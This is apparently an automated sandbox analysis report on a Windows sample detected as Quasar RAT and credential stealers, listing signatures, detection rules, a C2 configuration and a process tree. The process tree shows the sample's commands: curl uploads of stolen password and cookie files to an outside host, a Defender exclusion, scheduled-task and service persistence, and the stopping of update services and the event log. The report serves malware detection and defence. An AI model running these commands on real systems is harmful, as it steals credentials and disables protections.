Analysis Report
w85VkFOxiD.exe
Overview
General Information
Sample name: | w85VkFOxiD.exe (renamed because the original name is a hash value) |
Original sample name: | 4BB4FF4B1FA6C7E122557D8A55826242.exe |
Analysis ID: | 1440251 |
MD5: | 4bb4ff4b1fa6c7e122557d8a55826242 |
SHA1: | 241427d58cc7787fd24536821080244f344ddc74 |
SHA256: | a45c739b9f551d8633053381950f20a617ae2fe9c1d96d4f433d8ffa3015fb5e |
Tags: | exe, QuasarRAT, RAT |
Detection
Python Stealer, CStealer, NiceRAT, Quasar
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Schedule system process
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected CStealer
Yara detected NiceRAT
Yara detected Quasar RAT
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Drops PE files to the startup folder
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Uses dynamic DNS services
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Yara detected Generic Python Stealer
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (STR)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- w85VkFOxiD.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\w85VkFOxiD.exe" MD5: 4BB4FF4B1FA6C7E122557D8A55826242)
- powershell.exe (PID: 3336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAawBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAaQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAcgB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdgBwACMAPgA=" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- R3nzSkin_Injector.exe (PID: 2664 cmdline: "C:\Users\user\AppData\Local\Temp\R3nzSkin_Injector.exe" MD5: 8AF17734385F55DC58F1CA38BCE22312)
- Conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Update.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Roaming\Update.exe" MD5: F91699F2FF3F446461A302EA2D69BE44)
- schtasks.exe (PID: 7348 cmdline: "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- RuntimeBroker.exe (PID: 7428 cmdline: "C:\Users\user\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" MD5: F91699F2FF3F446461A302EA2D69BE44)
- schtasks.exe (PID: 7492 cmdline: "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\ApplicationFrameHost\RuntimeBroker.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
- conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- SearchServices.exe (PID: 7240 cmdline: "C:\Users\user\AppData\Roaming\SearchServices.exe" MD5: E35564F0BAD6C37132DC4157519F52E3)
- SearchServices.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\SearchServices.exe" MD5: E35564F0BAD6C37132DC4157519F52E3)
- cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 7812 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 6668 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 5804 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 6528 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7412 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- Conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- SecurityHealthServices.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Local\SecurityHealthServices.exe" MD5: 5143FE6D0C9218C03877131E7FF8F195)
- powershell.exe (PID: 7584 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wusa.exe (PID: 7936 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
- sc.exe (PID: 7880 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7992 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 8032 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 8080 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 2004 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 5480 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7372 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 7392 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- dialer.exe (PID: 7008 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
- winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
- lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
- svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
- svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- Conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7536 cmdline: C:\Windows\system32\sc.exe delete "KPAADCYR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 2896 cmdline: C:\Windows\system32\sc.exe create "KPAADCYR" binpath= "C:\ProgramData\xskudridktfu\vmarkghgnurz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7712 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 7692 cmdline: C:\Windows\system32\sc.exe start "KPAADCYR" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- vmarkghgnurz.exe (PID: 4428 cmdline: C:\ProgramData\xskudridktfu\vmarkghgnurz.exe MD5: 5143FE6D0C9218C03877131E7FF8F195)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DynamicStealer | Dynamic Stealer is a GitHub project written in C# by L1ghtN4n. The code collects passwords and uploads them to Telegram. According to Cyble, Eternity Stealer leverages code from this project, and Jester Stealer may also be a rebrand of it. | No Attribution | | |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Quasar RAT, QuasarRAT | Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult. | | | |
{"Version": "1.4.1", "Host:Port": "bardu3662.duckdns.org:9733;", "SubDirectory": "ApplicationFrameHost", "InstallName": "RuntimeBroker.exe", "MutexName": "afa58199-2aae-4e08-8ef4-8e4ef39bc0aa", "StartupKey": "Update", "Tag": "Webhook", "LogDirectoryName": "Logs", "ServerSignature": "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", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAPuDEcknjDYT2HqBiX26qTANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDQyOTIxMjQ1OVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgQ20vEo+N2+LTOwPnW1Wb0vf92dR+r7EH01r29qEXKYU1huZoYQu5+JgazqBN8rZ/xANqydFHODfD+TJhLJKiJMw/8VY84epokrOc+MPVpKok59utEmYotaR4YpyPVvU0apiaojAIUJ0mGyvfougGroLp90jEo1YgraLHqvdfj89tbPgqqt2qVdYLnwIsZT4sa/qcH2ZsYU1/3JCk4hd3Q4/Pyz3oRsUNzyMPoPLcFL73vqxdNCa44zL8qYunOZmQtYzqNX+rPmiFUw6rSUpXUAmMFowbvvw3D7fse8SMYAe3q2rO0AO8VdtH8HWDRD3KYVdGhrUxVjPO1yfYKz4ogsn6pNl0SwzoiyfOT10dOtxiNbz/Ks/hTnmVWL3w4LQrnKc9qcgNjDRihFZOlsy66g6XTQnb7VySvqCiV1Huq0YbDwK/LvnzhFuhFD0v6rMkXa36zV4jzcKJgGgN2bdxK+g7uvR5jNz+KWtiS9zK0gWxgZnllvBp09mdfgeLqp3njgntwjO2TqG7Ed+qHnMVi+QwJzF5e6eXWFg7qToI5EfDmAMyLA4ctd3gEZi4kFfRCes5lueqP4G1liiyEiw1OE4PqWTVC8mFVwNbOkPXhazUYRb7kUIsc1IiQ15Wb/Ro5Ku/5CdxFqw3ZpgCyyJJt88eUIasOsrl0QjqzLzWpcCAwEAAaMyMDAwHQYDVR0OBBYEFMPwzjGDS28XbbYbAZPlhz5Is8bHMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAFcNuAqADUp7/FIBI24jlwN8dQAXr9YEOVFq8DaBEvzlFqZOx3dxCFJMXxWqkh0B9nNirCguc+7cCrQvJA6VTiUNqgEsyeIsdPgB3cx/T29Th5fCciOFXt4JcdynTKUBG9ebTbq+jTkuWTjjV9E8rRg4ArwBJnPb5paXYhJEEDgaUkejcKPyOBAYREzBS94eAw65gtV4pn796NZ1k01pz5Vjp5OJealPhFAVpjfoy6d8CiAZXkyGTm2hn3s4nBAx9U/cuckl3/NV3gbAeB97qcvXWrNJscJllGBxeiyp/PppT3BlaPWCgpI1i7EzBgfyvFDU/62vEPUzpLOqQFuXp1lqsgL3MQgjK9+dvGg5hr7gBgjf3l2lsvBJhaUNVQBzUTxDb8zUjfo7EPqJmsDcbHmbeuCU6eFlwicVVbr9x7QMLpc6al1Gdi525zy4lDdolBNzsl0qirQKwxeP7KGVTG7RtsVcYLo5R9rBmvdvV01gjGj43hSCAhtiLP8qy4WVl206qXpkrBSvroncxhDA0WWvUwP1II6WcZqPxHWh/kzd24Tl5UHYsTycAGAAUHPWxHOmryAGEAMbNX72ARlxnV9k8mIATWz402A4BbXzkID6BjnLOU
ctzhOv/SM+KDw+4gjFLIN1COzRzSRjCfoTiFlz+hWHNuW+xczOFxLhAnjT"}
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth | |
INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen | |
MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen | |
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security | |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
JoeSecurity_NiceRAT | Yara detected NiceRAT | Joe Security | |
Rule | Description | Author | Strings |
---|---|---|---|
JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security | |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | |
MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth | |
INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen | |
MALWARE_Win_QuasarStealer | Detects Quasar infostealer | ditekshen | |
Change of critical system settings
- Author: Joe Security
System Summary
- Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
- Author: Florian Roth (Nextron Systems)
- Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
- Author: Florian Roth (Nextron Systems)
- Author: frack113
- Author: Florian Roth (Nextron Systems)
- Author: Florian Roth (Nextron Systems)
- Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
- Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
- Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Persistence and Installation Behavior
- Author: Joe Security
HIPS / PFW / Operating System Protection Evasion
- Author: Joe Security
Timestamp: | 05/12/24-23:37:07.083444 |
SID: | 2035595 |
Source Port: | 9733 |
Destination Port: | 49731 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection
- Source: Avira
- Source: URL Reputation
- Source: URL Reputation
- Source: Malware Configuration Extractor